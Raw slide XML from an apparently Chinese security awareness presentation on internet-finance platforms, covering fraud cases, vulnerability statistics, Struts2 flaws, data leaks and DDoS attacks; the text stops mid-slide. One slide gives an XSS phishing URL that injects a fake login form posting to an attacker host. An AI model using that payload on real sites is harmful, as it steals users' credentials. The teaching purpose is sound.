            <a:ext cx="2268351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835725" y="3969778"/>
            <a:ext cx="172819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416819" y="4438520"/>
            <a:ext cx="162018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405191" y="5030754"/>
            <a:ext cx="120114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814317" y="1459087"/>
            <a:ext cx="170500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563657" y="6271988"/>
            <a:ext cx="241226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282172" y="6263626"/>
            <a:ext cx="1447185" cy="689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0718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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登录框钓鱼示例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0296" y="789250"/>
            <a:ext cx="90353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http://www.demo.com/xss.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=&lt;form Method="POST" Action="http://hack.cn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xss.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>" Name="form"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>账号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:&lt;input name="login"&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:&lt;input name="pass" type="password"/&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&gt;&lt;input name="valid" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>" type="submit"/&gt;&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400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4272" y="2860288"/>
            <a:ext cx="1199627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701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685"/>
            <a:ext cx="9753600" cy="58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15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5441" y="948722"/>
            <a:ext cx="9467436" cy="2929528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zh-CN" sz="2400" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>深圳市公安局反信息诈骗咨询专线接到一事主报案称：其经营一家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>互联网公司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下午突然接到客户询问，称有多笔资金未按时到帐。经公司财务核对，需向客户支付的款项早已汇出。经过询问，事主发现有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个商户帐户资料被嫌疑人通过网络入侵篡改成嫌疑人银行账号，该公司财务向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>个陌生账号汇去款项共计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>万元。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黑客篡改用户账号盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>万</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="122944874.jpg (413×26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1" y="2964708"/>
            <a:ext cx="393382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608" y="2937520"/>
            <a:ext cx="65151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7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280" y="2721496"/>
            <a:ext cx="9404580" cy="432048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328" y="1065312"/>
            <a:ext cx="8208912" cy="1008112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截止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>日，已经收集了互联网金融平台漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>433</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个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156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96" y="1281336"/>
            <a:ext cx="9111960" cy="547260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每个月出现的安全漏洞数量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5984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96" y="993304"/>
            <a:ext cx="7772343" cy="597666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高风险漏洞占</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>82%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278898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5092824" y="1137320"/>
          <a:ext cx="2770537" cy="1728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4763"/>
                <a:gridCol w="715774"/>
              </a:tblGrid>
              <a:tr h="3456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危害等级</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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汇总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456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高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356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456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中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57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456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低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20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456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总计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433</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-C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282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漏洞状态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320" y="678799"/>
            <a:ext cx="8496944" cy="6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13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296130"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="628328" y="1137320"/>
          <a:ext cx="8352928" cy="561662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7056784"/>
                <a:gridCol w="1296144"/>
              </a:tblGrid>
              <a:tr h="6224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漏洞状态</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1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汇总</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1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厂商已经确认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171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厂商已经修复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等待厂商处理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漏洞已经通知厂商但是厂商忽略漏洞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32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未联系到厂商或者厂商积极忽略</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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38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2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已交由第三方合作机构</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(CCERT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>教育网应急响应组</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>处理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2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已交由第三方合作机构</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(cncert</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>国家互联网应急中心</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>处理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44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2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已交由第三方合作机构</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(Hitcon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>台湾互联网漏洞报告平台</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>处理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已交由第三方合作机构</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>公安部一所</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>处理</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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101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正在联系厂商或者等待认领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34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总计</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" alt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433</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-C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厂商确认只占</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>40%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9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9744" y="-47661"/>
            <a:ext cx="6984776" cy="73776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漏洞类型排行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有时候，一个漏洞可以打死一片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开发框架风险：某网贷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程命令执行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4768" y="871518"/>
            <a:ext cx="906696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600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  某网贷网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程命令执行漏洞，轻松获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5D6A6D"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="26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019148" y="1585898"/>
            <a:ext cx="7786742" cy="5429288"/>
            <a:chOff x="947710" y="1585898"/>
            <a:chExt cx="7786742" cy="5429288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947710" y="1585898"/>
              <a:ext cx="7786742" cy="5429288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="08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19147" y="1657336"/>
              <a:ext cx="7643867" cy="5298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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733528" y="2728906"/>
            <a:ext cx="2357454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162552" y="1800212"/>
            <a:ext cx="2357454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203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c629d9039245d688b5f6c42da5c27d1ed01b2492.jpg (442×442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" y="776820"/>
            <a:ext cx="5760640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th7.cn/d/file/p/2013/07/18/e4d3216b3525be4a968d75bfd1f377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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4012704" y="776820"/>
            <a:ext cx="5904656" cy="715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9545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通用平台</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>风险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80" y="849288"/>
            <a:ext cx="6810375" cy="6219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67" y="2423102"/>
            <a:ext cx="6466667" cy="4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28" y="921296"/>
            <a:ext cx="6696744" cy="61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066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手机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>APP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6" y="1065312"/>
            <a:ext cx="8928992" cy="5576208"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27610853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3" y="849288"/>
            <a:ext cx="5472608" cy="616284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手机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安全风险点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793504"/>
            <a:ext cx="4443403" cy="267884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881659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61892" y="800080"/>
            <a:ext cx="3329668" cy="6357982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>从脱库到撞库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安全已经不是一个人的事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也不是一个网站的事</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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安全不是一个网站的事情</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="http://upload.techweb.com.cn/2014/1226/14195507431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16" y="921296"/>
            <a:ext cx="5688632" cy="36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1209328"/>
            <a:ext cx="6238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33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01" y="849288"/>
            <a:ext cx="4755207" cy="635793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永远不要相信已经安全了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16360" y="1137320"/>
            <a:ext cx="25202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坏人都是不讲原则的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68288" y="596185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某黑客惨遭社工，银行卡手机金钱被盗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87487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748048"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="161925" y="800100"/>
          <a:ext cx="9429750" cy="635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敏感数据相关风险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4556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57204"/>
            <a:ext cx="9904458" cy="665799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安全不是一个人的事情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9691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280" y="921296"/>
            <a:ext cx="6806540" cy="417646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数据泄露案例 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 爆破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60" y="1281336"/>
            <a:ext cx="10248900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560" y="804490"/>
            <a:ext cx="6591300" cy="441007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172" name="Picture 4" descr="http://static.wooyun.org/wooyun/upload/201501/19160814460334debbface811f6a2f57dc7b870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35" y="3542739"/>
            <a:ext cx="8924925" cy="342900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197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88" y="849288"/>
            <a:ext cx="7116085" cy="302433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数据泄露案例 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="http://static.wooyun.org/wooyun/upload/201506/06145428bd8db436bea9c3c36ad2c386b0b64ab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19" y="2865512"/>
            <a:ext cx="10086543" cy="46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399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60" y="0"/>
            <a:ext cx="10424900" cy="7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152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04" y="993304"/>
            <a:ext cx="9046005" cy="482453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P2P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网贷两周年庆典遭黑客敲诈：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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>封了你们的网站，通知你们老板联系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>我们。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2" y="2361456"/>
            <a:ext cx="7962070" cy="3690042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600" y="3899139"/>
            <a:ext cx="64103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217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80" y="849288"/>
            <a:ext cx="8424936" cy="63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296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打击DDOS犯罪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744" y="14807"/>
            <a:ext cx="9773344" cy="733000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6480" y="69840"/>
            <a:ext cx="7643834" cy="657204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>研究人员利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>万僵尸节点创建全球</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>地图</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
            </a:b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254020" y="6201980"/>
            <a:ext cx="738872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33" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://internetcensus2012.bitbucket.org/paper.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2133" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254020" y="1895012"/>
            <a:ext cx="2934097" cy="2389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/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2133" dirty="0"/>
              <a:t>IPv6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2133" dirty="0"/>
              <a:t>即将大面积推广之际，某研究人员利用非常规手段，绘制了一份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2133" dirty="0"/>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2133" dirty="0"/>
              <a:t>地球全图。此图造成了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2133" dirty="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2133" dirty="0"/>
              <a:t>万以上节点的僵尸网络。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2133" dirty="0"/>
              <a:t>9TB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2133" dirty="0"/>
              <a:t>的数据量已经开放下载。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449" y="2014155"/>
            <a:ext cx="5735962" cy="32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565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" y="777280"/>
            <a:ext cx="9660515" cy="54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300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2404" y="6692028"/>
            <a:ext cx="8928992" cy="307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1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.freebuf.com/news/8102.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1401" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695960" y="833677"/>
            <a:ext cx="806927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60" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2560" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>年： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3840" b="1" dirty="0"/>
              <a:t>300Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3840" b="1" dirty="0"/>
              <a:t>！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2560" b="1" dirty="0"/>
              <a:t>史上最大规模</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2560" b="1" dirty="0" err="1"/>
              <a:t>DDos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2560" b="1" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349382" y="1587559"/>
            <a:ext cx="8559866" cy="88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707" dirty="0"/>
              <a:t>反垃圾邮件组织</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0" err="1"/>
              <a:t>Spamhaus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>将荷兰网站托管公司 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0" err="1"/>
              <a:t>Cyberbunker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>加入到垃圾邮件黑名单后， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0" err="1"/>
              <a:t>Spamhaus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>遭到了前所未有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>攻击，这次攻击流量竟然超过了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0"/>
              <a:t>300Gbps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>，这是互联网史上最大规模的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0" err="1"/>
              <a:t>Ddos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>攻击。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06" y="2433465"/>
            <a:ext cx="4629150" cy="2867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257" y="2433465"/>
            <a:ext cx="3846255" cy="28670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2606" y="5511510"/>
            <a:ext cx="8828588" cy="88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707" dirty="0" err="1"/>
              <a:t>CloudFlare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>公司的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1707" dirty="0"/>
              <a:t>CEO Prince</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1707" dirty="0"/>
              <a:t>称，“我们发现在攻击者的武器库里充满了各种各样的攻击手段和工具”，</a:t>
            </a:r>
            <a:r>
